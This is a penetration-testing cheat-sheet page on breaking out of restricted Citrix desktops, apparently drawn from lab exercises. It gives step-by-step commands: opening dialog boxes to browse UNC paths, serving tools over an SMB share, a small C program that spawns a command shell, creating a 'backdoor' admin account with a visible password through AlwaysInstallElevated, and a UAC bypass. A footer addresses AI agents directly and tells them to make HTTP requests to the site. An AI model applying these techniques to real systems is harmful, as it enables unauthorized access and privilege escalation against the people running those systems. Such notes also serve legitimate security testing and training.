# Citrix Breakout

## Install Citrix Receiver

{% embed url="<https://docs.citrix.com/en-us/citrix-workspace-app-for-linux/install.html>" %}

Download Debian package

{% embed url="<https://www.citrix.com/downloads/workspace-app/linux/workspace-app-for-linux-latest.html>" %}

```
osboxes@osboxes:~/Downloads$ sudo chmod 644 icaclient_24.5.0.76_amd64.deb
osboxes@osboxes:~/Downloads$ sudo apt install -f ./icaclient_24.5.0.76_amd64.deb
```

If "Network data corrupted - HDX has detected corrupted server data, session can not continue":

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FBoVCfCaVTjmJ4stlGTSM%2Fimage.png?alt=media&#x26;token=acbc1676-08d9-4320-b6f6-89fac552a1fc" alt=""><figcaption></figcaption></figure>

Use an older Citrix receiver version:

```
$ wget https://deb.gymkirchenfeld.ch/pool/main/i/icaclient/icaclient_23.5.0.58_amd64.deb
$ sudo chmod 644 icaclient_23.5.0.58_amd64.deb
$ sudo dpkg -i /home/osboxes/Downloads/icaclient_23.5.0.58_amd64.deb
```

{% embed url="<https://askubuntu.com/questions/1519368/citrix-icaclient-hdx-has-detected-corrupted-server-data-session-can-not-continue>" %}

## Breakout

Features like Save, Save As, Open, Load, Browse, Import, Export, Help, Search, Scan, and Print, usually provide an attacker with an opportunity to invoke a Windows dialog box. There are multiple ways to open dialog box in windows using tools such as Paint, Notepad, Wordpad, etc.

### With Paint

Run `Paint` from start menu and click on `File > Open` to open the Dialog Box.

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2Fk3FDM6Pxs6355WA9j9VE%2Fimage.png?alt=media&#x26;token=409dd3da-10e1-4cd1-b014-e3c60f402e40" alt=""><figcaption></figcaption></figure>

With the windows dialog box open for paint, we can enter the [UNC](https://learn.microsoft.com/en-us/dotnet/standard/io/file-path-formats#unc-paths) path `\\127.0.0.1\c$\users\pmorgan` under the File name field, with File-Type set to `All Files` and upon hitting enter we gain access to the desired directory.

### Create .bat file

{% embed url="<https://0xdf.gitlab.io/2020/06/17/endgame-xen.html>" %}

## Accessing SMB share from restricted environment

```shell-session
smbserver.py -smb2support share $(pwd)
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2Fdu2wkvDrNve4zu7px44P%2Fimage.png?alt=media&#x26;token=3b35ffd9-91b7-4da3-b141-f6a7c6773090" alt=""><figcaption></figcaption></figure>

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FD59qv0CjZAB5VKky6V47%2Fimage.png?alt=media&#x26;token=5daa663f-2aba-436b-bbb9-89fd69c0df75" alt=""><figcaption></figcaption></figure>

&#x20;Right-click on the `pwn.exe` binary and select `Open`, which should prompt us to run it and a cmd console will be opened.

pwn.exe:

```c
#include <stdlib.h>
int main() {
  system("C:\\Windows\\System32\\cmd.exe");
}
```

{% embed url="<https://explorerplusplus.com/>" %}

`Explorer++` to copy files from the `\\10.13.38.95\share` location to the Desktop belonging to the user `pmorgan`.

Being a portable application, it can be executed directly without the need for installation

## Alternate Registry Editors

&#x20;Alternative Registry editors can be employed to bypass the standard group policy restrictions. [Simpleregedit](https://sourceforge.net/projects/simpregedit/), [Uberregedit](https://sourceforge.net/projects/uberregedit/) and [SmallRegistryEditor](https://sourceforge.net/projects/sre/) are examples of such GUI tools

## Modify existing shortcut file

```
C:\Windows\System32\cmd.exe
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2F7LFD6dvFOpzU549d6Bcv%2Fimage.png?alt=media&#x26;token=3774961c-66fb-4329-a99d-66640d38f845" alt=""><figcaption></figcaption></figure>

Other options: transfer an existing shortcut file using an SMB server. Alternatively, we can create a new shortcut file using PowerShell

## Script Execution

1. Create a new text file and name it "evil.bat".
2. Open "evil.bat" with a text editor such as Notepad.
3. Input the command "cmd" into the file.&#x20;

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2F4efSt5IQr9TNayBoErry%2Fimage.png?alt=media&#x26;token=864925a6-a411-4b63-8448-d0be64b4a3b3" alt=""><figcaption></figcaption></figure>

## Escalating Privileges

WinPeas or PowerUp -> **AlwaysInstallElevated**

{% content-ref url="miscellaneous-techniques" %}
[miscellaneous-techniques](https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/windows/miscellaneous-techniques)
{% endcontent-ref %}

```cmd-session
C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
		AlwaysInstallElevated    REG_DWORD    0x1


C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
		AlwaysInstallElevated    REG_DWORD    0x1
```

```powershell-session
PS C:\Users\pmorgan\Desktop> Import-Module .\PowerUp.ps1
PS C:\Users\pmorgan\Desktop> Write-UserAddMSI
	
Output Path
-----------
UserAdd.msi
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FV8aaA7xdlxEXJEesZ3f2%2Fimage.png?alt=media&#x26;token=6bfab547-931e-4acd-b761-e2bb96595bfa" alt=""><figcaption></figcaption></figure>

```cmd-session
C:\> runas /user:backdoor cmd

Enter the password for backdoor: T3st@123
Attempting to start cmd as user "VDESKTOP3\backdoor" ...
```

## Bypass UAC

```cmd-session
C:\Windows\system32> cd C:\Users\Administrator

Access is denied.
```

```powershell-session
PS C:\Users\Public> Import-Module .\Bypass-UAC.ps1
PS C:\Users\Public> Bypass-UAC -Method UacMethodSysprep
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2F2crEYNdaYn9jsYWQVP44%2Fimage.png?alt=media&#x26;token=a6b1bfb2-c3bb-4f1f-971d-e1817c2d5dd9" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/windows/citrix-breakout.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.